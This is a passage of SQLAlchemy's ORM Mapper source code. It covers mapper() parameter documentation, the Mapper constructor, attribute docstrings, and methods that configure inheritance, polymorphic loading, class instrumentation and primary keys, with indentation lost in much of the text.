make use of :term:`RETURNING` for backends which support it.
:param exclude_properties: A list or set of string column names to
be excluded from mapping.
See :ref:`include_exclude_cols` for an example.
:param extension: A :class:`.MapperExtension` instance or
list of :class:`.MapperExtension` instances which will be applied
to all operations by this :class:`.Mapper`.
.. deprecated:: 0.7
:class:`.MapperExtension` is deprecated in favor of the
:class:`.MapperEvents` listener interface. The
:paramref:`.mapper.extension` parameter will be
removed in a future release.
:param include_properties: An inclusive list or set of string column
names to map.
See :ref:`include_exclude_cols` for an example.
:param inherits: A mapped class or the corresponding :class:`.Mapper`
of one indicating a superclass to which this :class:`.Mapper`
should *inherit* from. The mapped class here must be a subclass
of the other mapper's class. When using Declarative, this argument
is passed automatically as a result of the natural class
hierarchy of the declared classes.
.. seealso::
:ref:`inheritance_toplevel`
:param inherit_condition: For joined table inheritance, a SQL
expression which will
define how the two tables are joined; defaults to a natural join
between the two tables.
:param inherit_foreign_keys: When ``inherit_condition`` is used and
the columns present are missing a :class:`.ForeignKey`
configuration, this parameter can be used to specify which columns
are "foreign". In most cases can be left as ``None``.
:param legacy_is_orphan: Boolean, defaults to ``False``.
When ``True``, specifies that "legacy" orphan consideration
is to be applied to objects mapped by this mapper, which means
that a pending (that is, not persistent) object is auto-expunged
from an owning :class:`.Session` only when it is de-associated
from *all* parents that specify a ``delete-orphan`` cascade towards
this mapper. The new default behavior is that the object is
auto-expunged when it is de-associated with *any* of its parents
that specify ``delete-orphan`` cascade. This behavior is more
consistent with that of a persistent object, and allows behavior to
be consistent in more scenarios independently of whether or not an
orphanable object has been flushed yet or not.
See the change note and example at :ref:`legacy_is_orphan_addition`
for more detail on this change.
.. versionadded:: 0.8 - the consideration of a pending object as
an "orphan" has been modified to more closely match the
behavior as that of persistent objects, which is that the object
is expunged from the :class:`.Session` as soon as it is
de-associated from any of its orphan-enabled parents. Previously,
the pending object would be expunged only if de-associated
from all of its orphan-enabled parents. The new flag
``legacy_is_orphan`` is added to :func:`.orm.mapper` which
re-establishes the legacy behavior.
:param non_primary: Specify that this :class:`.Mapper` is in addition
to the "primary" mapper, that is, the one used for persistence.
The :class:`.Mapper` created here may be used for ad-hoc
mapping of the class to an alternate selectable, for loading
only.
:paramref:`.Mapper.non_primary` is not an often used option, but
is useful in some specific :func:`.relationship` cases.
.. seealso::
:ref:`relationship_non_primary_mapper`
:param order_by: A single :class:`.Column` or list of :class:`.Column`
objects for which selection operations should use as the default
ordering for entities. By default mappers have no pre-defined
ordering.
.. deprecated:: 1.1 The :paramref:`.Mapper.order_by` parameter
is deprecated, and will be removed in a future release.
Use :meth:`.Query.order_by` to determine the ordering of a
result set.
:param passive_deletes: Indicates DELETE behavior of foreign key
columns when a joined-table inheritance entity is being deleted.
Defaults to ``False`` for a base mapper; for an inheriting mapper,
defaults to ``False`` unless the value is set to ``True``
on the superclass mapper.
When ``True``, it is assumed that ON DELETE CASCADE is configured
on the foreign key relationships that link this mapper's table
to its superclass table, so that when the unit of work attempts
to delete the entity, it need only emit a DELETE statement for the
superclass table, and not this table.
When ``False``, a DELETE statement is emitted for this mapper's
table individually. If the primary key attributes local to this
table are unloaded, then a SELECT must be emitted in order to
validate these attributes; note that the primary key columns
of a joined-table subclass are not part of the "primary key" of
the object as a whole.
Note that a value of ``True`` is **always** forced onto the
subclass mappers; that is, it's not possible for a superclass
to specify passive_deletes without this taking effect for
all subclass mappers.
.. versionadded:: 1.1
.. seealso::
:ref:`passive_deletes` - description of similar feature as
used with :func:`.relationship`
:paramref:`.mapper.passive_updates` - supporting ON UPDATE
CASCADE for joined-table inheritance mappers
:param passive_updates: Indicates UPDATE behavior of foreign key
columns when a primary key column changes on a joined-table
inheritance mapping. Defaults to ``True``.
When True, it is assumed that ON UPDATE CASCADE is configured on
the foreign key in the database, and that the database will handle
propagation of an UPDATE from a source column to dependent columns
on joined-table rows.
When False, it is assumed that the database does not enforce
referential integrity and will not be issuing its own CASCADE
operation for an update. The unit of work process will
emit an UPDATE statement for the dependent columns during a
primary key change.
.. seealso::
:ref:`passive_updates` - description of a similar feature as
used with :func:`.relationship`
:paramref:`.mapper.passive_deletes` - supporting ON DELETE
CASCADE for joined-table inheritance mappers
:param polymorphic_load: Specifies "polymorphic loading" behavior
for a subclass in an inheritance hierarchy (joined and single
table inheritance only). Valid values are:
* "'inline'" - specifies this class should be part of the
"with_polymorphic" mappers, e.g. its columns will be included
in a SELECT query against the base.
* "'selectin'" - specifies that when instances of this class
are loaded, an additional SELECT will be emitted to retrieve
the columns specific to this subclass. The SELECT uses
IN to fetch multiple subclasses at once.
.. versionadded:: 1.2
.. seealso::
:ref:`with_polymorphic_mapper_config`
:ref:`polymorphic_selectin`
:param polymorphic_on: Specifies the column, attribute, or
SQL expression used to determine the target class for an
incoming row, when inheriting classes are present.
This value is commonly a :class:`.Column` object that's
present in the mapped :class:`.Table`::
class Employee(Base):
__tablename__ = 'employee'
id = Column(Integer, primary_key=True)
discriminator = Column(String(50))
__mapper_args__ = {
"polymorphic_on":discriminator,
"polymorphic_identity":"employee"
}
It may also be specified
as a SQL expression, as in this example where we
use the :func:`.case` construct to provide a conditional
approach::
class Employee(Base):
__tablename__ = 'employee'
id = Column(Integer, primary_key=True)
discriminator = Column(String(50))
__mapper_args__ = {
"polymorphic_on":case([
(discriminator == "EN", "engineer"),
(discriminator == "MA", "manager"),
], else_="employee"),
"polymorphic_identity":"employee"
}
It may also refer to any attribute
configured with :func:`.column_property`, or to the
string name of one::
class Employee(Base):
__tablename__ = 'employee'
id = Column(Integer, primary_key=True)
discriminator = Column(String(50))
employee_type = column_property(
case([
(discriminator == "EN", "engineer"),
(discriminator == "MA", "manager"),
], else_="employee")
)
__mapper_args__ = {
"polymorphic_on":employee_type,
"polymorphic_identity":"employee"
}
.. versionchanged:: 0.7.4
``polymorphic_on`` may be specified as a SQL expression,
or refer to any attribute configured with
:func:`.column_property`, or to the string name of one.
When setting ``polymorphic_on`` to reference an
attribute or expression that's not present in the
locally mapped :class:`.Table`, yet the value
of the discriminator should be persisted to the database,
the value of the
discriminator is not automatically set on new
instances; this must be handled by the user,
either through manual means or via event listeners.
A typical approach to establishing such a listener
looks like::
from sqlalchemy import event
from sqlalchemy.orm import object_mapper
@event.listens_for(Employee, "init", propagate=True)
def set_identity(instance, *arg, **kw):
mapper = object_mapper(instance)
instance.discriminator = mapper.polymorphic_identity
Where above, we assign the value of ``polymorphic_identity``
for the mapped class to the ``discriminator`` attribute,
thus persisting the value to the ``discriminator`` column
in the database.
.. warning::
Currently, **only one discriminator column may be set**, typically
on the base-most class in the hierarchy. "Cascading" polymorphic
columns are not yet supported.
.. seealso::
:ref:`inheritance_toplevel`
:param polymorphic_identity: Specifies the value which
identifies this particular class as returned by the
column expression referred to by the ``polymorphic_on``
setting. As rows are received, the value corresponding
to the ``polymorphic_on`` column expression is compared
to this value, indicating which subclass should
be used for the newly reconstructed object.
:param properties: A dictionary mapping the string names of object
attributes to :class:`.MapperProperty` instances, which define the
persistence behavior of that attribute. Note that :class:`.Column`
objects present in
the mapped :class:`.Table` are automatically placed into
``ColumnProperty`` instances upon mapping, unless overridden.
When using Declarative, this argument is passed automatically,
based on all those :class:`.MapperProperty` instances declared
in the declared class body.
:param primary_key: A list of :class:`.Column` objects which define
the primary key to be used against this mapper's selectable unit.
This is normally simply the primary key of the ``local_table``, but
can be overridden here.
:param version_id_col: A :class:`.Column`
that will be used to keep a running version id of rows
in the table. This is used to detect concurrent updates or
the presence of stale data in a flush. The methodology is to
detect if an UPDATE statement does not match the last known
version id, a
:class:`~sqlalchemy.orm.exc.StaleDataError` exception is
thrown.
By default, the column must be of :class:`.Integer` type,
unless ``version_id_generator`` specifies an alternative version
generator.
.. seealso::
:ref:`mapper_version_counter` - discussion of version counting
and rationale.
:param version_id_generator: Define how new version ids should
be generated. Defaults to ``None``, which indicates that
a simple integer counting scheme be employed. To provide a custom
versioning scheme, provide a callable function of the form::
def generate_version(version):
return next_version
Alternatively, server-side versioning functions such as triggers,
or programmatic versioning schemes outside of the version id
generator may be used, by specifying the value ``False``.
Please see :ref:`server_side_version_counter` for a discussion
of important points when using this option.
.. versionadded:: 0.9.0 ``version_id_generator`` supports
server-side version number generation.
.. seealso::
:ref:`custom_version_counter`
:ref:`server_side_version_counter`
:param with_polymorphic: A tuple in the form ``(<classes>,
<selectable>)`` indicating the default style of "polymorphic"
loading, that is, which tables are queried at once. <classes> is
any single or list of mappers and/or classes indicating the
inherited classes that should be loaded at once. The special value
``'*'`` may be used to indicate all descending classes should be
loaded immediately. The second tuple argument <selectable>
indicates a selectable that will be used to query for multiple
classes.
.. seealso::
:ref:`with_polymorphic` - discussion of polymorphic querying
techniques.
"""
self.class_ = util.assert_arg_type(class_, type, "class_")
self.class_manager = None
self._primary_key_argument = util.to_list(primary_key)
self.non_primary = non_primary
if order_by is not False:
self.order_by = util.to_list(order_by)
util.warn_deprecated(
"Mapper.order_by is deprecated."
"Use Query.order_by() in order to affect the ordering of ORM "
"result sets."
)
else:
self.order_by = order_by
self.always_refresh = always_refresh
if isinstance(version_id_col, MapperProperty):
self.version_id_prop = version_id_col
self.version_id_col = None
else:
self.version_id_col = version_id_col
if version_id_generator is False:
self.version_id_generator = False
elif version_id_generator is None:
self.version_id_generator = lambda x: (x or 0) + 1
else:
self.version_id_generator = version_id_generator
self.concrete = concrete
self.single = False
self.inherits = inherits
self.local_table = local_table
self.inherit_condition = inherit_condition
self.inherit_foreign_keys = inherit_foreign_keys
self._init_properties = properties or {}
self._delete_orphans = []
self.batch = batch
self.eager_defaults = eager_defaults
self.column_prefix = column_prefix
self.polymorphic_on = expression._clause_element_as_expr(
polymorphic_on
)
self._dependency_processors = []
self.validators = util.immutabledict()
self.passive_updates = passive_updates
self.passive_deletes = passive_deletes
self.legacy_is_orphan = legacy_is_orphan
self._clause_adapter = None
self._requires_row_aliasing = False
self._inherits_equated_pairs = None
self._memoized_values = {}
self._compiled_cache_size = _compiled_cache_size
self._reconstructor = None
self._deprecated_extensions = util.to_list(extension or [])
self.allow_partial_pks = allow_partial_pks
if self.inherits and not self.concrete:
self.confirm_deleted_rows = False
else:
self.confirm_deleted_rows = confirm_deleted_rows
if isinstance(self.local_table, expression.SelectBase):
raise sa_exc.InvalidRequestError(
"When mapping against a select() construct, map against "
"an alias() of the construct instead."
"This because several databases don't allow a "
"SELECT from a subquery that does not have an alias."
)
self._set_with_polymorphic(with_polymorphic)
self.polymorphic_load = polymorphic_load
# our 'polymorphic identity', a string name that when located in a
# result set row indicates this Mapper should be used to construct
# the object instance for that row.
self.polymorphic_identity = polymorphic_identity
# a dictionary of 'polymorphic identity' names, associating those
# names with Mappers that will be used to construct object instances
# upon a select operation.
if _polymorphic_map is None:
self.polymorphic_map = {}
else:
self.polymorphic_map = _polymorphic_map
if include_properties is not None:
self.include_properties = util.to_set(include_properties)
else:
self.include_properties = None
if exclude_properties:
self.exclude_properties = util.to_set(exclude_properties)
else:
self.exclude_properties = None
self.configured = False
# prevent this mapper from being constructed
# while a configure_mappers() is occurring (and defer a
# configure_mappers() until construction succeeds)
_CONFIGURE_MUTEX.acquire()
try:
self.dispatch._events._new_mapper_instance(class_, self)
self._configure_inheritance()
self._configure_legacy_instrument_class()
self._configure_class_instrumentation()
self._configure_listeners()
self._configure_properties()
self._configure_polymorphic_setter()
self._configure_pks()
Mapper._new_mappers = True
self._log("constructed")
self._expire_memoizations()
finally:
_CONFIGURE_MUTEX.release()
# major attributes initialized at the classlevel so that
# they can be Sphinx-documented.
is_mapper = True
"""Part of the inspection API."""
represents_outer_join = False
    @property
    def mapper(self):
        """Part of the inspection API.

        Returns self.

        """
        return self
    @property
    def entity(self):
        r"""Part of the inspection API.

        Returns self.class\_.

        """
        return self.class_
local_table = None
"""The :class:`.Selectable` which this :class:`.Mapper` manages.
Typically is an instance of :class:`.Table` or :class:`.Alias`.
May also be ``None``.
The "local" table is the
selectable that the :class:`.Mapper` is directly responsible for
managing from an attribute access and flush perspective. For
non-inheriting mappers, the local table is the same as the
"mapped" table. For joined-table inheritance mappers, local_table
will be the particular sub-table of the overall "join" which
this :class:`.Mapper` represents. If this mapper is a
single-table inheriting mapper, local_table will be ``None``.
.. seealso::
:attr:`~.Mapper.mapped_table`.
"""
mapped_table = None
"""The :class:`.Selectable` to which this :class:`.Mapper` is mapped.
Typically an instance of :class:`.Table`, :class:`.Join`, or
:class:`.Alias`.
The "mapped" table is the selectable that
the mapper selects from during queries. For non-inheriting
mappers, the mapped table is the same as the "local" table.
For joined-table inheritance mappers, mapped_table references the
full :class:`.Join` representing full rows for this particular
subclass. For single-table inheritance mappers, mapped_table
references the base table.
.. seealso::
:attr:`~.Mapper.local_table`.
"""
inherits = None
"""References the :class:`.Mapper` which this :class:`.Mapper`
inherits from, if any.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
configured = None
"""Represent ``True`` if this :class:`.Mapper` has been configured.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
.. seealso::
:func:`.configure_mappers`.
"""
concrete = None
"""Represent ``True`` if this :class:`.Mapper` is a concrete
inheritance mapper.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
tables = None
"""An iterable containing the collection of :class:`.Table` objects
which this :class:`.Mapper` is aware of.
If the mapper is mapped to a :class:`.Join`, or an :class:`.Alias`
representing a :class:`.Select`, the individual :class:`.Table`
objects that comprise the full construct will be represented here.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
primary_key = None
"""An iterable containing the collection of :class:`.Column` objects
which comprise the 'primary key' of the mapped table, from the
perspective of this :class:`.Mapper`.
This list is against the selectable in :attr:`~.Mapper.mapped_table`. In
the case of inheriting mappers, some columns may be managed by a
superclass mapper. For example, in the case of a :class:`.Join`, the
primary key is determined by all of the primary key columns across all
tables referenced by the :class:`.Join`.
The list is also not necessarily the same as the primary key column
collection associated with the underlying tables; the :class:`.Mapper`
features a ``primary_key`` argument that can override what the
:class:`.Mapper` considers as primary key columns.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
class_ = None
"""The Python class which this :class:`.Mapper` maps.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
class_manager = None
"""The :class:`.ClassManager` which maintains event listeners
and class-bound descriptors for this :class:`.Mapper`.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
single = None
"""Represent ``True`` if this :class:`.Mapper` is a single table
inheritance mapper.
:attr:`~.Mapper.local_table` will be ``None`` if this flag is set.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
non_primary = None
"""Represent ``True`` if this :class:`.Mapper` is a "non-primary"
mapper, e.g. a mapper that is used only to selet rows but not for
persistence management.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
polymorphic_on = None
"""The :class:`.Column` or SQL expression specified as the
``polymorphic_on`` argument
for this :class:`.Mapper`, within an inheritance scenario.
This attribute is normally a :class:`.Column` instance but
may also be an expression, such as one derived from
:func:`.cast`.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
polymorphic_map = None
"""A mapping of "polymorphic identity" identifiers mapped to
:class:`.Mapper` instances, within an inheritance scenario.
The identifiers can be of any type which is comparable to the
type of column represented by :attr:`~.Mapper.polymorphic_on`.
An inheritance chain of mappers will all reference the same
polymorphic map object. The object is used to correlate incoming
result rows to target mappers.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
polymorphic_identity = None
"""Represent an identifier which is matched against the
:attr:`~.Mapper.polymorphic_on` column during result row loading.
Used only with inheritance, this object can be of any type which is
comparable to the type of column represented by
:attr:`~.Mapper.polymorphic_on`.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
base_mapper = None
"""The base-most :class:`.Mapper` in an inheritance chain.
In a non-inheriting scenario, this attribute will always be this
:class:`.Mapper`. In an inheritance scenario, it references
the :class:`.Mapper` which is parent to all other :class:`.Mapper`
objects in the inheritance chain.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
columns = None
"""A collection of :class:`.Column` or other scalar expression
objects maintained by this :class:`.Mapper`.
The collection behaves the same as that of the ``c`` attribute on
any :class:`.Table` object, except that only those columns included in
this mapping are present, and are keyed based on the attribute name
defined in the mapping, not necessarily the ``key`` attribute of the
:class:`.Column` itself. Additionally, scalar expressions mapped
by :func:`.column_property` are also present here.
This is a *read only* attribute determined during mapper construction.
Behavior is undefined if directly modified.
"""
validators = None
"""An immutable dictionary of attributes which have been decorated
using the :func:`~.orm.validates` decorator.
The dictionary contains string attribute names as keys
mapped to the actual validation method.
"""
c = None
"""A synonym for :attr:`~.Mapper.columns`."""
@util.memoized_property
def _path_registry(self):
    # Root PathRegistry node for this mapper; computed once and
    # cached via util.memoized_property.
    return PathRegistry.per_mapper(self)
def _configure_inheritance(self):
    """Configure settings related to inheriting and/or inherited
    mappers being present.

    Establishes ``mapped_table``, ``base_mapper``, the shared
    ``polymorphic_map``, and the settings propagated from the
    superclass mapper; or installs base-mapper defaults when there
    is no inheritance.
    """
    # a set of all mappers which inherit from this one.
    self._inheriting_mappers = util.WeakSequence()
    if self.inherits:
        # ``inherits`` may be given as a class; resolve it to its
        # Mapper without triggering full configuration.
        if isinstance(self.inherits, type):
            self.inherits = class_mapper(self.inherits, configure=False)
        if not issubclass(self.class_, self.inherits.class_):
            raise sa_exc.ArgumentError(
                "Class '%s' does not inherit from '%s'"
                % (self.class_.__name__, self.inherits.class_.__name__)
            )
        # primary mappers may only inherit from primary mappers,
        # and likewise for non-primary.
        if self.non_primary != self.inherits.non_primary:
            np = not self.non_primary and "primary" or "non-primary"
            raise sa_exc.ArgumentError(
                "Inheritance of %s mapper for class '%s' is "
                "only allowed from a %s mapper"
                % (np, self.class_.__name__, np)
            )
        # inherit_condition is optional.
        if self.local_table is None:
            # no table of our own: single-table inheritance; share
            # the parent's selectables.
            self.local_table = self.inherits.local_table
            self.mapped_table = self.inherits.mapped_table
            self.single = True
        elif self.local_table is not self.inherits.local_table:
            if self.concrete:
                # concrete table inheritance: select only from our
                # own table, no join to the parent.
                self.mapped_table = self.local_table
                for mapper in self.iterate_to_root():
                    if mapper.polymorphic_on is not None:
                        mapper._requires_row_aliasing = True
            else:
                # joined-table inheritance: join the parent's
                # selectable to our local table.
                if self.inherit_condition is None:
                    # figure out inherit condition from our table to the
                    # immediate table of the inherited mapper, not its
                    # full table which could pull in other stuff we don't
                    # want (allows test/inheritance.InheritTest4 to pass)
                    self.inherit_condition = sql_util.join_condition(
                        self.inherits.local_table, self.local_table
                    )
                self.mapped_table = sql.join(
                    self.inherits.mapped_table,
                    self.local_table,
                    self.inherit_condition,
                )
                fks = util.to_set(self.inherit_foreign_keys)
                self._inherits_equated_pairs = sql_util.criterion_as_pairs(
                    self.mapped_table.onclause,
                    consider_as_foreign_keys=fks,
                )
        else:
            self.mapped_table = self.local_table
        # non-concrete polymorphic subclasses share the parent's
        # identity-map class.
        if self.polymorphic_identity is not None and not self.concrete:
            self._identity_class = self.inherits._identity_class
        else:
            self._identity_class = self.class_
        if self.version_id_col is None:
            self.version_id_col = self.inherits.version_id_col
            self.version_id_generator = self.inherits.version_id_generator
        elif (
            self.inherits.version_id_col is not None
            and self.version_id_col is not self.inherits.version_id_col
        ):
            util.warn(
                "Inheriting version_id_col '%s' does not match inherited "
                "version_id_col '%s' and will not automatically populate "
                "the inherited versioning column. "
                "version_id_col should only be specified on "
                "the base-most mapper that includes versioning."
                % (
                    self.version_id_col.description,
                    self.inherits.version_id_col.description,
                )
            )
        if (
            self.order_by is False
            and not self.concrete
            and self.inherits.order_by is not False
        ):
            self.order_by = self.inherits.order_by
        # the polymorphic map and several flags are shared across the
        # entire inheritance hierarchy.
        self.polymorphic_map = self.inherits.polymorphic_map
        self.batch = self.inherits.batch
        self.inherits._inheriting_mappers.append(self)
        self.base_mapper = self.inherits.base_mapper
        self.passive_updates = self.inherits.passive_updates
        self.passive_deletes = (
            self.inherits.passive_deletes or self.passive_deletes
        )
        self._all_tables = self.inherits._all_tables
        if self.polymorphic_identity is not None:
            # warn on duplicate identities before overwriting the entry.
            if self.polymorphic_identity in self.polymorphic_map:
                util.warn(
                    "Reassigning polymorphic association for identity %r "
                    "from %r to %r: Check for duplicate use of %r as "
                    "value for polymorphic_identity."
                    % (
                        self.polymorphic_identity,
                        self.polymorphic_map[self.polymorphic_identity],
                        self,
                        self.polymorphic_identity,
                    )
                )
            self.polymorphic_map[self.polymorphic_identity] = self
        if self.polymorphic_load and self.concrete:
            raise sa_exc.ArgumentError(
                "polymorphic_load is not currently supported "
                "with concrete table inheritance"
            )
        if self.polymorphic_load == "inline":
            self.inherits._add_with_polymorphic_subclass(self)
        elif self.polymorphic_load == "selectin":
            # accepted here; no immediate setup required.
            pass
        elif self.polymorphic_load is not None:
            raise sa_exc.ArgumentError(
                "unknown argument for polymorphic_load: %r"
                % self.polymorphic_load
            )
    else:
        # no inheritance: this mapper is its own base.
        self._all_tables = set()
        self.base_mapper = self
        self.mapped_table = self.local_table
        if self.polymorphic_identity is not None:
            self.polymorphic_map[self.polymorphic_identity] = self
        self._identity_class = self.class_
    if self.mapped_table is None:
        raise sa_exc.ArgumentError(
            "Mapper '%s' does not have a mapped_table specified." % self
        )
def _set_with_polymorphic(self, with_polymorphic):
    """Normalize and install the ``with_polymorphic`` setting.

    Accepts ``"*"`` (all subclasses), a sequence of classes, or a
    ``(spec, selectable)`` tuple, and stores the normalized
    ``(spec, selectable-or-None)`` tuple on ``self.with_polymorphic``.
    A plain select() given as the selectable is automatically aliased.

    :raises sa_exc.ArgumentError: for any other value.
    :raises sa_exc.InvalidRequestError: if this mapper is mapped
        against a raw select() rather than an alias() of it.
    """
    if with_polymorphic == "*":
        self.with_polymorphic = ("*", None)
    elif isinstance(with_polymorphic, (tuple, list)):
        if isinstance(
            with_polymorphic[0], util.string_types + (tuple, list)
        ):
            # already a (spec, selectable) pair
            self.with_polymorphic = with_polymorphic
        else:
            # bare sequence of classes; no explicit selectable
            self.with_polymorphic = (with_polymorphic, None)
    elif with_polymorphic is not None:
        raise sa_exc.ArgumentError("Invalid setting for with_polymorphic")
    else:
        self.with_polymorphic = None
    if isinstance(self.local_table, expression.SelectBase):
        # message fixed: the original ran "instead." and "This because"
        # together with no separating space and a grammar slip.
        raise sa_exc.InvalidRequestError(
            "When mapping against a select() construct, map against "
            "an alias() of the construct instead. "
            "This is because several databases don't allow a "
            "SELECT from a subquery that does not have an alias."
        )
    if self.with_polymorphic and isinstance(
        self.with_polymorphic[1], expression.SelectBase
    ):
        # auto-alias a select() supplied as the polymorphic selectable
        self.with_polymorphic = (
            self.with_polymorphic[0],
            self.with_polymorphic[1].alias(),
        )
    if self.configured:
        self._expire_memoizations()
def _add_with_polymorphic_subclass(self, mapper):
subcl = mapper.class_
if self.with_polymorphic is None:
self._set_with_polymorphic((subcl,))
elif self.with_polymorphic[0] != "*":
self._set_with_polymorphic(
(self.with_polymorphic[0] + (subcl,), self.with_polymorphic[1])
)
def _set_concrete_base(self, mapper):
    """Set the given :class:`.Mapper` as the 'inherits' for this
    :class:`.Mapper`, assuming this :class:`.Mapper` is concrete
    and does not already have an inherits."""
    assert self.concrete
    assert not self.inherits
    assert isinstance(mapper, Mapper)
    self.inherits = mapper
    # merge our identities into the shared hierarchy-wide map.
    self.inherits.polymorphic_map.update(self.polymorphic_map)
    self.polymorphic_map = self.inherits.polymorphic_map
    # NOTE(review): this loop rebinds the name ``mapper``, shadowing
    # the method argument.
    for mapper in self.iterate_to_root():
        if mapper.polymorphic_on is not None:
            mapper._requires_row_aliasing = True
    self.batch = self.inherits.batch
    for mp in self.self_and_descendants:
        mp.base_mapper = self.inherits.base_mapper
    self.inherits._inheriting_mappers.append(self)
    self.passive_updates = self.inherits.passive_updates
    self._all_tables = self.inherits._all_tables
    # NOTE(review): because of the shadowing above, ``mapper`` here is
    # the last mapper yielded by iterate_to_root() (the base-most
    # mapper), not the argument passed in -- confirm this is intended.
    for key, prop in mapper._props.items():
        if key not in self._props and not self._should_exclude(
            key, key, local=False, column=None
        ):
            self._adapt_inherited_property(key, prop, False)
def _set_polymorphic_on(self, polymorphic_on):
    # Late (re)assignment of the discriminator column; re-runs the
    # polymorphic setter configuration against the new value.
    self.polymorphic_on = polymorphic_on
    self._configure_polymorphic_setter(True)
def _configure_legacy_instrument_class(self):
if self.inherits:
self.dispatch._update(self.inherits.dispatch)
super_extensions = set(
chain(
*[
m._deprecated_extensions
for m in self.inherits.iterate_to_root()
]
)
)
else:
super_extensions = set()
for ext in self._deprecated_extensions:
if ext not in super_extensions:
ext._adapt_instrument_class(self, ext)
def _configure_listeners(self):
if self.inherits:
super_extensions = set(
chain(
*[
m._deprecated_extensions
for m in self.inherits.iterate_to_root()
]
)
)
else:
super_extensions = set()
for ext in self._deprecated_extensions:
if ext not in super_extensions:
ext._adapt_listener(self, ext)
def _configure_class_instrumentation(self):
    """If this mapper is to be a primary mapper (i.e. the
    non_primary flag is not set), associate this Mapper with the
    given class_ and entity name.

    Subsequent calls to ``class_mapper()`` for the class_/entity
    name combination will return this mapper. Also decorate the
    `__init__` method on the mapped class to include optional
    auto-session attachment logic.
    """
    manager = attributes.manager_of_class(self.class_)
    if self.non_primary:
        # non-primary mappers piggyback on the primary mapper's
        # instrumentation; a primary mapper must already exist.
        if not manager or not manager.is_mapped:
            raise sa_exc.InvalidRequestError(
                "Class %s has no primary mapper configured. Configure "
                "a primary mapper first before setting up a non primary "
                "Mapper." % self.class_
            )
        self.class_manager = manager
        self._identity_class = manager.mapper._identity_class
        _mapper_registry[self] = True
        return
    if manager is not None:
        assert manager.class_ is self.class_
        if manager.is_mapped:
            raise sa_exc.ArgumentError(
                "Class '%s' already has a primary mapper defined. "
                "Use non_primary=True to "
                "create a non primary Mapper. clear_mappers() will "
                "remove *all* current mappers from all classes."
                % self.class_
            )
        # else:
        # a ClassManager may already exist as
        # ClassManager.instrument_attribute() creates
        # new managers for each subclass if they don't yet exist.
    _mapper_registry[self] = True
    # note: this *must be called before instrumentation.register_class*
    # to maintain the documented behavior of instrument_class
    self.dispatch.instrument_class(self, self.class_)
    if manager is None:
        manager = instrumentation.register_class(self.class_)
    self.class_manager = manager
    manager.mapper = self
    manager.deferred_scalar_loader = util.partial(
        loading.load_scalar_attributes, self
    )
    # The remaining members can be added by any mapper,
    # e_name None or not.
    if manager.info.get(_INSTRUMENTOR, False):
        return
    event.listen(manager, "first_init", _event_on_first_init, raw=True)
    event.listen(manager, "init", _event_on_init, raw=True)
    # scan class attributes for @reconstructor / @validates markers.
    for key, method in util.iterate_attributes(self.class_):
        if key == "__init__" and hasattr(method, "_sa_original_init"):
            method = method._sa_original_init
            if isinstance(method, types.MethodType):
                # unwrap a (Python 2 style) bound/unbound method to
                # its underlying function
                method = method.im_func
        if isinstance(method, types.FunctionType):
            if hasattr(method, "__sa_reconstructor__"):
                # @reconstructor-decorated: invoke on instance load.
                self._reconstructor = method
                event.listen(manager, "load", _event_on_load, raw=True)
            elif hasattr(method, "__sa_validators__"):
                # @validates-decorated: register per attribute name.
                validation_opts = method.__sa_validation_opts__
                for name in method.__sa_validators__:
                    if name in self.validators:
                        raise sa_exc.InvalidRequestError(
                            "A validation function for mapped "
                            "attribute %r on mapper %s already exists."
                            % (name, self)
                        )
                    self.validators = self.validators.union(
                        {name: (method, validation_opts)}
                    )
    manager.info[_INSTRUMENTOR] = self
@classmethod
def _configure_all(cls):
    """Class-level path to the :func:`.configure_mappers` call."""
    configure_mappers()
def dispose(self):
    """Tear down this mapper, removing class instrumentation when this
    mapper is the active primary mapper for its class."""
    # Disable any attribute-based compilation.
    self.configured = True
    self._dispose_called = True
    if hasattr(self, "_configure_failed"):
        del self._configure_failed
    # Only an active primary mapper un-instruments the class.
    if self.non_primary:
        return
    manager = self.class_manager
    if manager is None or not manager.is_mapped:
        return
    if manager.mapper is not self:
        return
    instrumentation.unregister_class(self.class_)
def _configure_pks(self):
    """Determine primary key columns for this mapper, populating
    ``self.primary_key``, ``self._pks_by_table``,
    ``self._cols_by_table`` and ``self._readonly_props``."""
    self.tables = sql_util.find_tables(self.mapped_table)
    self._pks_by_table = {}
    self._cols_by_table = {}
    # every column (and proxy thereof) mapped by this mapper.
    all_cols = util.column_set(
        chain(*[col.proxy_set for col in self._columntoproperty])
    )
    pk_cols = util.column_set(c for c in all_cols if c.primary_key)
    # identify primary key columns which are also mapped by this mapper.
    tables = set(self.tables + [self.mapped_table])
    self._all_tables.update(tables)
    for t in tables:
        if t.primary_key and pk_cols.issuperset(t.primary_key):
            # ordering is important since it determines the ordering of
            # mapper.primary_key (and therefore query.get())
            self._pks_by_table[t] = util.ordered_column_set(
                t.primary_key
            ).intersection(pk_cols)
        self._cols_by_table[t] = util.ordered_column_set(t.c).intersection(
            all_cols
        )
    # if explicit PK argument sent, add those columns to the
    # primary key mappings
    if self._primary_key_argument:
        for k in self._primary_key_argument:
            if k.table not in self._pks_by_table:
                self._pks_by_table[k.table] = util.OrderedSet()
            self._pks_by_table[k.table].add(k)
    # otherwise, see that we got a full PK for the mapped table
    elif (
        self.mapped_table not in self._pks_by_table
        or len(self._pks_by_table[self.mapped_table]) == 0
    ):
        raise sa_exc.ArgumentError(
            "Mapper %s could not assemble any primary "
            "key columns for mapped table '%s'"
            % (self, self.mapped_table.description)
        )
    elif self.local_table not in self._pks_by_table and isinstance(
        self.local_table, schema.Table
    ):
        util.warn(
            "Could not assemble any primary "
            "keys for locally mapped table '%s' - "
            "no rows will be persisted in this Table."
            % self.local_table.description
        )
    if (
        self.inherits
        and not self.concrete
